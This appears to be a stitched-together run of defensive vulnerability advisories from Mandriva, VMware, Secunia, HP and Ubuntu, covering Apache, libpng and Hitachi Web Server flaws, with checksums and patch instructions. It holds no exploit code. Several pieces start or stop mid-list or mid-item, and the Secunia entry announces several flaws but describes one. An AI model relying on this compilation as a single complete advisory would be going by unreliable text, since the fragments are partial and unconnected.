2007.0/SRPMS/apache-2.2.3-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 7c5408879073413fb27f2d40854813d0 2007.0/x86_64/apache-base-2.2.3-1.1mdv2007.0.x86_64.rpm c720f2a661616b0bf35bc353d14b9b3b 2007.0/x86_64/apache-devel-2.2.3-1.1mdv2007.0.x86_64.rpm 12164d6d70972cb9ed2fb6581e212bf1 2007.0/x86_64/apache-htcacheclean-2.2.3-1.1mdv2007.0.x86_64.rpm 5278f8d03ce9d59ec4929d4362b04bbe 2007.0/x86_64/apache-mod_authn_dbd-2.2.3-1.1mdv2007.0.x86_64.rpm 40c83185db12d04f4953a374b329ebb3 2007.0/x86_64/apache-mod_cache-2.2.3-1.1mdv2007.0.x86_64.rpm fe37fb1d4378c4bbcfd8d63bd57c3d4d 2007.0/x86_64/apache-mod_dav-2.2.3-1.1mdv2007.0.x86_64.rpm 0830bc5d1718a533e3358a45975596ce 2007.0/x86_64/apache-mod_dbd-2.2.3-1.1mdv2007.0.x86_64.rpm e18c3a6a322258e73b87170766aa7882 2007.0/x86_64/apache-mod_deflate-2.2.3-1.1mdv2007.0.x86_64.rpm fc8c27067e6b04bd549fe0b95579ebaa 2007.0/x86_64/apache-mod_disk_cache-2.2.3-1.1mdv2007.0.x86_64.rpm b31385db2199fd33eeb624c80e9d882a 2007.0/x86_64/apache-mod_file_cache-2.2.3-1.1mdv2007.0.x86_64.rpm 08123786649152eab65e123c75db8e66 2007.0/x86_64/apache-mod_ldap-2.2.3-1.1mdv2007.0.x86_64.rpm 7de4b739d93683648209dcdc69dd5473 2007.0/x86_64/apache-mod_mem_cache-2.2.3-1.1mdv2007.0.x86_64.rpm 85fde2923d945f3849d77f806b8bc55d 2007.0/x86_64/apache-mod_proxy-2.2.3-1.1mdv2007.0.x86_64.rpm b68991944f2989b6d3f89f7272239d76 2007.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.1mdv2007.0.x86_64.rpm 19871683773211daa721957dc5dd565d 2007.0/x86_64/apache-mod_ssl-2.2.3-1.1mdv2007.0.x86_64.rpm 5cf2a97219d6789e4572da1ecddedf16 2007.0/x86_64/apache-mod_userdir-2.2.3-1.1mdv2007.0.x86_64.rpm feede872aaf0ca4bbd86ffe24455e9cd 2007.0/x86_64/apache-modules-2.2.3-1.1mdv2007.0.x86_64.rpm a00a35d4eba8f538cea741b2fc4079f4 2007.0/x86_64/apache-mpm-prefork-2.2.3-1.1mdv2007.0.x86_64.rpm da86251e4417f068d2cafed30e380779 2007.0/x86_64/apache-mpm-worker-2.2.3-1.1mdv2007.0.x86_64.rpm ceb7fd32d3ad933ab6a914085f858911 2007.0/x86_64/apache-source-2.2.3-1.1mdv2007.0.x86_64.rpm 411b90e42ed304f329e9989d64a9dfc5 2007.0/SRPMS/apache-2.2.3-1.1mdv2007.0.src.rpm Mandriva Linux 2007.1: 9daef91724ded29a3c76e74c261f7766 2007.1/i586/apache-base-2.2.4-6.2mdv2007.1.i586.rpm 9288ee938a0853d6e0072f839c68c1c2 2007.1/i586/apache-devel-2.2.4-6.2mdv2007.1.i586.rpm 613a986f9f654f1ce3432ee6f6db2391 2007.1/i586/apache-htcacheclean-2.2.4-6.2mdv2007.1.i586.rpm 8e0eb376d851d1ddba8850d4233fc3d3 2007.1/i586/apache-mod_authn_dbd-2.2.4-6.2mdv2007.1.i586.rpm 24de68668efa15e4abaaffd690837256 2007.1/i586/apache-mod_cache-2.2.4-6.2mdv2007.1.i586.rpm 288866908d43959c4b31c368346ba65d 2007.1/i586/apache-mod_dav-2.2.4-6.2mdv2007.1.i586.rpm d25838ec739d7a0037148f573262f81c 2007.1/i586/apache-mod_dbd-2.2.4-6.2mdv2007.1.i586.rpm ebad14bcccb73c8f8a27e98a6982a6f1 2007.1/i586/apache-mod_deflate-2.2.4-6.2mdv2007.1.i586.rpm 810d445f2146848b582e798e368b32ab 2007.1/i586/apache-mod_disk_cache-2.2.4-6.2mdv2007.1.i586.rpm 307de93279683b5b3e76ee6d971781cc 2007.1/i586/apache-mod_file_cache-2.2.4-6.2mdv2007.1.i586.rpm f59890e1bc38cfa598a4100705cf4cc6 2007.1/i586/apache-mod_ldap-2.2.4-6.2mdv2007.1.i586.rpm 098a05d1cbaa6bfa2d2707896dd6366c 2007.1/i586/apache-mod_mem_cache-2.2.4-6.2mdv2007.1.i586.rpm 6504f5e57440ff07da16de3d928898f6 2007.1/i586/apache-mod_proxy-2.2.4-6.2mdv2007.1.i586.rpm adc3a611a780e23178e93a6cedf135d4 2007.1/i586/apache-mod_proxy_ajp-2.2.4-6.2mdv2007.1.i586.rpm 659508a67fbe28b5dd9f861384ca1cf1 2007.1/i586/apache-mod_ssl-2.2.4-6.2mdv2007.1.i586.rpm 604eb70716d7e7b6bc6e8399cc4d9f5c 2007.1/i586/apache-mod_userdir-2.2.4-6.2mdv2007.1.i586.rpm 750d7cb431356abc88fe7a031f872b04 2007.1/i586/apache-modules-2.2.4-6.2mdv2007.1.i586.rpm 210be718db221db891452f05a001ee4e 2007.1/i586/apache-mpm-event-2.2.4-6.2mdv2007.1.i586.rpm 482e3d3af6756108c3e9a26ec2a8ac56 2007.1/i586/apache-mpm-itk-2.2.4-6.2mdv2007.1.i586.rpm b76ff4578c127ebd248b21a85a31140a 2007.1/i586/apache-mpm-prefork-2.2.4-6.2mdv2007.1.i586.rpm 2484dee8a4d4e7604a69abcd1b443954 2007.1/i586/apache-mpm-worker-2.2.4-6.2mdv2007.1.i586.rpm 9823f9b97e1829df97999494c3a3d453 2007.1/i586/apache-source-2.2.4-6.2mdv2007.1.i586.rpm ccbd9fad2b29ff86d8601f7201f48d72 2007.1/SRPMS/apache-2.2.4-6.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 4d043339268bff11fa07897ee3dc2988 2007.1/x86_64/apache-base-2.2.4-6.2mdv2007.1.x86_64.rpm afbae73f408fa95c9e4d25e3aa39583d 2007.1/x86_64/apache-devel-2.2.4-6.2mdv2007.1.x86_64.rpm d92c22ff28fcd919b3a8525f753066c3 2007.1/x86_64/apache-htcacheclean-2.2.4-6.2mdv2007.1.x86_64.rpm abe81d2effd6f4975accbdc8d25d089e 2007.1/x86_64/apache-mod_authn_dbd-2.2.4-6.2mdv2007.1.x86_64.rpm 480d5c31af3289f26953a691f92e2a51 2007.1/x86_64/apache-mod_cache-2.2.4-6.2mdv2007.1.x86_64.rpm 3feae93ade4038e67fcbaa691f2a74aa 2007.1/x86_64/apache-mod_dav-2.2.4-6.2mdv2007.1.x86_64.rpm b60eead7fe808fbc5eff6cb34f1de80b 2007.1/x86_64/apache-mod_dbd-2.2.4-6.2mdv2007.1.x86_64.rpm 023afee3221da629fd8e1d34006b7463 2007.1/x86_64/apache-mod_deflate-2.2.4-6.2mdv2007.1.x86_64.rpm 1180446c8cf65c196352006d6da00e17 2007.1/x86_64/apache-mod_disk_cache-2.2.4-6.2mdv2007.1.x86_64.rpm 0e8c2dfc0e42c23b0afbada9f8868bb6 2007.1/x86_64/apache-mod_file_cache-2.2.4-6.2mdv2007.1.x86_64.rpm 32aa45f45b8893d6c23c6892b7ad7e62 2007.1/x86_64/apache-mod_ldap-2.2.4-6.2mdv2007.1.x86_64.rpm 15c20ffb5fdc8ab2a6fa92157c9f0536 2007.1/x86_64/apache-mod_mem_cache-2.2.4-6.2mdv2007.1.x86_64.rpm f91fd6552f480eb36d030bb2e91d30b4 2007.1/x86_64/apache-mod_proxy-2.2.4-6.2mdv2007.1.x86_64.rpm 2c9d1e35af7adebaeb6284bf5da4dd5f 2007.1/x86_64/apache-mod_proxy_ajp-2.2.4-6.2mdv2007.1.x86_64.rpm caa59aaba47c89d20e799a3f02271afd 2007.1/x86_64/apache-mod_ssl-2.2.4-6.2mdv2007.1.x86_64.rpm 8ac44f8c409ea29492a3acdc1eb44c7f 2007.1/x86_64/apache-mod_userdir-2.2.4-6.2mdv2007.1.x86_64.rpm 0f2198ec988390ff3b7843a1e7090517 2007.1/x86_64/apache-modules-2.2.4-6.2mdv2007.1.x86_64.rpm 2548664fde736f25acf59f46c847d1ff 2007.1/x86_64/apache-mpm-event-2.2.4-6.2mdv2007.1.x86_64.rpm 2434c402bae11969ddf5281f2f042d24 2007.1/x86_64/apache-mpm-itk-2.2.4-6.2mdv2007.1.x86_64.rpm 8a06ecd19726db033496a042c6a6be2f 2007.1/x86_64/apache-mpm-prefork-2.2.4-6.2mdv2007.1.x86_64.rpm e8d339c397409391f3fb36f704c38c6c 2007.1/x86_64/apache-mpm-worker-2.2.4-6.2mdv2007.1.x86_64.rpm 8a6f923428242f7aa1b4d489739e241b 2007.1/x86_64/apache-source-2.2.4-6.2mdv2007.1.x86_64.rpm ccbd9fad2b29ff86d8601f7201f48d72 2007.1/SRPMS/apache-2.2.4-6.2mdv2007.1.src.rpm Corporate 4.0: 74beb8d1579ce5d5f12c8b15981b6e63 corporate/4.0/i586/apache-base-2.2.3-1.1.20060mlcs4.i586.rpm 326a8259b0d99bc2938bfa6cd85743e7 corporate/4.0/i586/apache-devel-2.2.3-1.1.20060mlcs4.i586.rpm ca305d0928255a65814af781b345a056 corporate/4.0/i586/apache-htcacheclean-2.2.3-1.1.20060mlcs4.i586.rpm 48c2b6a5ee11c3f011b1f6dc60a86479 corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.1.20060mlcs4.i586.rpm b81a3077cb88a34af43a61ad6f2559ea corporate/4.0/i586/apache-mod_cache-2.2.3-1.1.20060mlcs4.i586.rpm ba5aee0b2a86182560e54f0cf4d360bd corporate/4.0/i586/apache-mod_dav-2.2.3-1.1.20060mlcs4.i586.rpm b696352106c5a0d1697385523455c767 corporate/4.0/i586/apache-mod_dbd-2.2.3-1.1.20060mlcs4.i586.rpm e79f271f000dd7f3a009cca70fd7e4a2 corporate/4.0/i586/apache-mod_deflate-2.2.3-1.1.20060mlcs4.i586.rpm c7bdb987f61099b64e751639ca02dd8a corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.1.20060mlcs4.i586.rpm b0303fcc2f43bdcf25419dde56df2297 corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.1.20060mlcs4.i586.rpm f818ff0f890abe230c92069f9d256e5c corporate/4.0/i586/apache-mod_ldap-2.2.3-1.1.20060mlcs4.i586.rpm 4247be23e42c368b3880c7ab5ac13c89 corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.1.20060mlcs4.i586.rpm e50f1749935c96d3364bdce9af5d22bf corporate/4.0/i586/apache-mod_proxy-2.2.3-1.1.20060mlcs4.i586.rpm a619b4e0130d1db7f77a790fee0917a6 corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.1.20060mlcs4.i586.rpm 8170e0e77256f08d07b02119400a19f9 corporate/4.0/i586/apache-mod_ssl-2.2.3-1.1.20060mlcs4.i586.rpm 4a5d94d4f94295efe48266a1d529486e corporate/4.0/i586/apache-mod_userdir-2.2.3-1.1.20060mlcs4.i586.rpm 7c0c27197d6b44115366eac339c424f2 corporate/4.0/i586/apache-modules-2.2.3-1.1.20060mlcs4.i586.rpm 56351aafc723fdea2f2fac22d5046944 corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.1.20060mlcs4.i586.rpm ccbb2f27b762b5dd564dc7a00aac6db0 corporate/4.0/i586/apache-mpm-worker-2.2.3-1.1.20060mlcs4.i586.rpm a65137ff29ed6a1da1f894d19997faec corporate/4.0/i586/apache-source-2.2.3-1.1.20060mlcs4.i586.rpm 8cdf592a822485abba00dfb6591615ea corporate/4.0/SRPMS/apache-2.2.3-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 7a9b4f5b3fcf2cac67e4c38022ee2441 corporate/4.0/x86_64/apache-base-2.2.3-1.1.20060mlcs4.x86_64.rpm 5604ba341d957fbe6182bd2eb29a8e9d corporate/4.0/x86_64/apache-devel-2.2.3-1.1.20060mlcs4.x86_64.rpm 8983bda4bbe3b58f9c6c317531eb52b7 corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.1.20060mlcs4.x86_64.rpm 9baf252cbc8ef8a093ed25e7a0daf25d corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.1.20060mlcs4.x86_64.rpm 26cc58bcbfd25a83c15051c8f590a36d corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm 941a32aea1b1b3bca1ae343d5d925892 corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.1.20060mlcs4.x86_64.rpm 1d79a7b921ce150de88e22ffbaba4b31 corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.1.20060mlcs4.x86_64.rpm d80b9ffca3dd024e73d069e55ba7fa3e corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.1.20060mlcs4.x86_64.rpm 7a7a11645680a7bee9cf88b166b0d32f corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm fcc85c0f9faf1fa08a01f3d4ecb68033 corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm 55789d16ff565bcd31dfa522435d4d4b corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.1.20060mlcs4.x86_64.rpm 7ee708824d65878b71ede35e139ac94d corporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm e8579835f848cade641da14354196497 corporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.1.20060mlcs4.x86_64.rpm 6a1e70a638aecf603f3bc2485d14bd78 corporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.1.20060mlcs4.x86_64.rpm 212f40574d0821b909972ebc36fb697a corporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.1.20060mlcs4.x86_64.rpm 32a8dd886e42c8093be05c9ee4d31855 corporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.1.20060mlcs4.x86_64.rpm 265bccd86baa7fca942f1c6d4d694523 corporate/4.0/x86_64/apache-modules-2.2.3-1.1.20060mlcs4.x86_64.rpm babdb585a6c754f23d91c41fc844a5e2 corporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.1.20060mlcs4.x86_64.rpm 63274f5c5dc3897d0062f621b1c63e0e corporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.1.20060mlcs4.x86_64.rpm 18782a1fcbcb760d36162ce830ac4cdd corporate/4.0/x86_64/apache-source-2.2.3-1.1.20060mlcs4.x86_64.rpm 8cdf592a822485abba00dfb6591615ea corporate/4.0/SRPMS/apache-2.2.3-1.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGjD3WmqjQ0CJFipgRAtGoAKCXMGCKCMbkso0ugvF0TpsWNwkPjgCfVakS Re00IyLecNs4MIGgsrv2qJE= =5EEm -----END PGP SIGNATURE----- . Summary Updated VMware Hosted products address security issues in libpng and the Apace HTTP Server. 2. Relevant releases VMware Workstation 6.5.2 and earlier, VMware Player 2.5.2 and earlier, VMware ACE 2.5.2 and earlier 3. Problem Description a. Third Party Library libpng Updated to 1.2.35 Several flaws were discovered in the way third party library libpng handled uninitialized pointers. An attacker could create a PNG image file in such a way, that when loaded by an application linked to libpng, it could cause the application to crash or execute arbitrary code at the privilege level of the user that runs the application. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2009-0040 to this issue. The following table lists what action remediates the vulnerability (column 4) if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======== ======= ================= VirtualCenter any Windows not affected Workstation 6.5.x any 6.5.3 build 185404 or later Player 2.5.x any 2.5.3 build 185404 or later ACE 2.5.x any 2.5.3 build 185404 or later Server 2.x any patch pending Server 1.x any patch pending Fusion 2.x Mac OS/X not affected Fusion 1.x Mac OS/X not affected ESXi 4.0 ESXi not affected ESXi 3.5 ESXi not affected ESX 4.0 ESX not affected ESX 3.5 ESX not affected ESX 3.0.3 ESX not affected ESX 3.0.2 ESX not affected ESX 2.5.5 ESX not affected * * The libpng update for the Service Console of ESX 2.5.5 is documented in VMSA-2009-0007. b. Apache HTTP Server updated to 2.0.63 The new version of ACE updates the Apache HTTP Server on Windows hosts to version 2.0.63 which addresses multiple security issues that existed in the previous versions of this server. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2007-3847, CVE-2007-1863, CVE-2006-5752, CVE-2007-3304, CVE-2007-6388, CVE-2007-5000, CVE-2008-0005 to the issues that have been addressed by this update. The following table lists what action remediates the vulnerability (column 4) if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======== ======= ================= VirtualCenter any Windows not affected Workstation 6.5.x any not affected Player 2.5.x any not affected ACE 2.5.x Windows 2.5.3 build 185404 or later ACE 2.5.x Linux update Apache on host system * Server 2.x any not affected Server 1.x any not affected Fusion 2.x Mac OS/X not affected Fusion 1.x Mac OS/X not affected ESXi 4.0 ESXi not affected ESXi 3.5 ESXi not affected ESX 4.0 ESX not affected ESX 3.5 ESX not affected ESX 3.0.3 ESX not affected ESX 3.0.2 ESX not affected ESX 2.5.5 ESX not affected * The Apache HTTP Server is not part of an ACE install on a Linux host. Update the Apache HTTP Server on the host system to version 2.0.63 in order to remediate the vulnerabilities listed above. 4. Solution Please review the patch/release notes for your product and version and verify the md5sum and/or the sha1sum of your downloaded file. VMware Workstation 6.5.3 ------------------------ http://www.vmware.com/download/ws/ Release notes: http://www.vmware.com/support/ws65/doc/releasenotes_ws653.html For Windows Workstation for Windows 32-bit and 64-bit Windows 32-bit and 64-bit .exe md5sum: 7565d16b7d7e0173b90c3b76ca4656bc sha1sum: 9f687afd8b0f39cde40aeceb3213a91be487aad1 For Linux Workstation for Linux 32-bit Linux 32-bit .rpm md5sum: 4d55c491bd008ded0ea19f373d1d1fd4 sha1sum: 1f43131c960e76a530390d3b6984c78dfc2da23e Workstation for Linux 32-bit Linux 32-bit .bundle md5sum: d4a721c1918c0e8a87c6fa4bad49ad35 sha1sum: c0c6f9b56e70bd3ffdb5467ee176110e283a69e5 Workstation for Linux 64-bit Linux 64-bit .rpm md5sum: 72adfdb03de4959f044fcb983412ae7c sha1sum: ba16163c8d9b5aa572526b34a7b63dc6e68f9bbb Workstation for Linux 64-bit Linux 64-bit .bundle md5sum: 83e1f0c94d6974286256c4d3b559e854 sha1sum: 8763f250a3ac5fc4698bd26319b93fecb498d542 VMware Player 2.5.3 ------------------- http://www.vmware.com/download/player/ Release notes: http://www.vmware.com/support/player25/doc/releasenotes_player253.html Player for Windows binary http://download3.vmware.com/software/vmplayer/VMware-player-2.5.3-185404.exe md5sum: fe28f193374c9457752ee16cd6cad4e7 sha1sum: 13bd3ff93c04fa272544d3ef6de5ae746708af04 Player for Linux (.rpm) http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.rpm md5sum: c99cd65f19fdfc7651bcb7f328b73bc2 sha1sum: a33231b26e2358a72d16e1b4e2656a5873fe637e Player for Linux (.bundle) http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.bundle md5sum: 210f4cb5615bd3b2171bc054b9b2bac5 sha1sum: 2f6497890b17b37480165bab9f430e8645edae9b Player for Linux - 64-bit (.rpm) http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.rpm md5sum: f91576ef90b322d83225117ae9335968 sha1sum: f492fa9cf26ee2818f164aac04cde1680c25d974 Player for Linux - 64-bit (.bundle) http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.bundle md5sum: 595d44d7945c129b1aeb679d2f001b05 sha1sum: acd69fcb0c6bc49fd4af748c65c7fb730ab1e8c4 VMware ACE 2.5.3 ---------------- http://www.vmware.com/download/ace/ Release notes: http://www.vmware.com/support/ace25/doc/releasenotes_ace253.html ACE Management Server Virtual Appliance AMS Virtual Appliance .zip md5sum: 44cc7b86353047f02cf6ea0653e38418 sha1sum: 9f44b15e6681a6e58dd20784f829c68091a62cd1 VMware ACE for Windows 32-bit and 64-bit Windows 32-bit and 64-bit .exe md5sum: 0779da73408c5e649e0fd1c62d23820f sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef ACE Management Server for Windows Windows .exe md5sum: 0779da73408c5e649e0fd1c62d23820f sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef ACE Management Server for SUSE Enterprise Linux 9 SLES 9 .rpm md5sum: a4fc92d7197f0d569361cdf4b8cca642 sha1sum: af8a135cca398cacaa82c8c3c325011c6cd3ed75 ACE Management Server for Red Hat Enterprise Linux 4 RHEL 4 .rpm md5sum: 841005151338c8b954f08d035815fd58 sha1sum: 67e48624dba20e6be9e41ec9a5aba407dd8cc01e 5. Change log 2009-08-20 VMSA-2009-0010 Initial security advisory after release of Workstation 6.5.3, Player 2.5.3, and ACE 2.5.3 on 2009-08-20. - ------------------------------------------------------------------------ 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Center http://www.vmware.com/security VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2009 VMware Inc. All rights reserved. ---------------------------------------------------------------------- 2003: 2,700 advisories published 2004: 3,100 advisories published 2005: 4,600 advisories published 2006: 5,300 advisories published How do you know which Secunia advisories are important to you? The Secunia Vulnerability Intelligence Solutions allows you to filter and structure all the information you need, so you can address issues effectively. Get a free trial of the Secunia Vulnerability Intelligence Solutions: http://corporate.secunia.com/how_to_buy/38/vi/?ref=secadv ---------------------------------------------------------------------- TITLE: Hitachi Web Server Multiple Vulnerabilities SECUNIA ADVISORY ID: SA27421 VERIFY ADVISORY: http://secunia.com/advisories/27421/ CRITICAL: Less critical IMPACT: Security Bypass, Cross Site Scripting WHERE: >From remote SOFTWARE: uCosminexus Application Server http://secunia.com/product/13819/ Hitachi Web Server 3.x http://secunia.com/product/13335/ Hitachi Web Server 2.x http://secunia.com/product/13334/ Hitachi Web Server 1.x http://secunia.com/product/13333/ DESCRIPTION: Some vulnerabilities have been reported in the Hitachi Web Server, which can be exploited by malicious people to bypass certain security restrictions or conduct cross-site scripting attacks. 1) An error exists within the handling of SSL requests. This can be exploited to trick a vulnerable server into accepting a forged signature. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.hitachi-support.com/security_e/vuls_e/HS07-034_e/index-e.html http://www.hitachi-support.com/security_e/vuls_e/HS07-035_e/index-e.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01178795 Version: 1 HPSBUX02262 SSRT071447 rev. 1 - HP-UX running Apache, Remote Arbitrary Code Execution, Cross Site Scripting (XSS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-10-02 Last Updated: 2007-10-02 Potential Security Impact: Remote arbitrary code execution, cross site scripting (XSS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with Apache running on HP-UX. References: CVE-2005-2090, CVE-2006-5752, CVE-2007-0450, CVE-2007-0774, CVE-2007-1355, CVE-2007-1358, CVE-2007-1860, CVE-2007-1863, CVE-2007-1887, CVE-2007-1900, CVE-2007-2449, CVE-2007-2450, CVE-2007-2756, CVE-2007-2872, CVE-2007-3382, CVE-2007-3385, CVE-2007-3386. SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running Apache BACKGROUND To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if the recommended patch or update is installed. AFFECTED VERSIONS For IPv4: HP-UX B.11.11 ============= hpuxwsAPACHE action: install revision A.2.0.59.00 or subsequent restart Apache URL: https://www.hp.com/go/softwaredepot/ For IPv6: HP-UX B.11.11 HP-UX B.11.23 HP-UX B.11.31 ============= hpuxwsAPACHE,revision=B.1.0.00.01 hpuxwsAPACHE,revision=B.1.0.07.01 hpuxwsAPACHE,revision=B.1.0.08.01 hpuxwsAPACHE,revision=B.1.0.09.01 hpuxwsAPACHE,revision=B.1.0.10.01 hpuxwsAPACHE,revision=B.2.0.48.00 hpuxwsAPACHE,revision=B.2.0.49.00 hpuxwsAPACHE,revision=B.2.0.50.00 hpuxwsAPACHE,revision=B.2.0.51.00 hpuxwsAPACHE,revision=B.2.0.52.00 hpuxwsAPACHE,revision=B.2.0.53.00 hpuxwsAPACHE,revision=B.2.0.54.00 hpuxwsAPACHE,revision=B.2.0.55.00 hpuxwsAPACHE,revision=B.2.0.56.00 hpuxwsAPACHE,revision=B.2.0.58.00 hpuxwsAPACHE,revision=B.2.0.58.01 action: install revision B.2.0.59.00 or subsequent restart Apache URL: https://www.hp.com/go/softwaredepot/ END AFFECTED VERSIONS RESOLUTION HP has made the following available to resolve the vulnerability. HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent. MANUAL ACTIONS: Yes - Update Install HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa HISTORY Revision: 1 (rev.1) - 02 October 2007 Initial release Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." \xa9Copyright 2007 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQA/AwUBRwVCruAfOvwtKn1ZEQK1YgCfavU7x1Hs59uLdP26lpZFwMxKofIAn3gJ HHoe3AY1sc6hrW3Xk+B1hcbr =+E1W -----END PGP SIGNATURE----- . =========================================================== Ubuntu Security Notice USN-499-1 August 16, 2007 apache2 vulnerabilities CVE-2006-5752, CVE-2007-1863, CVE-2007-3304 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of 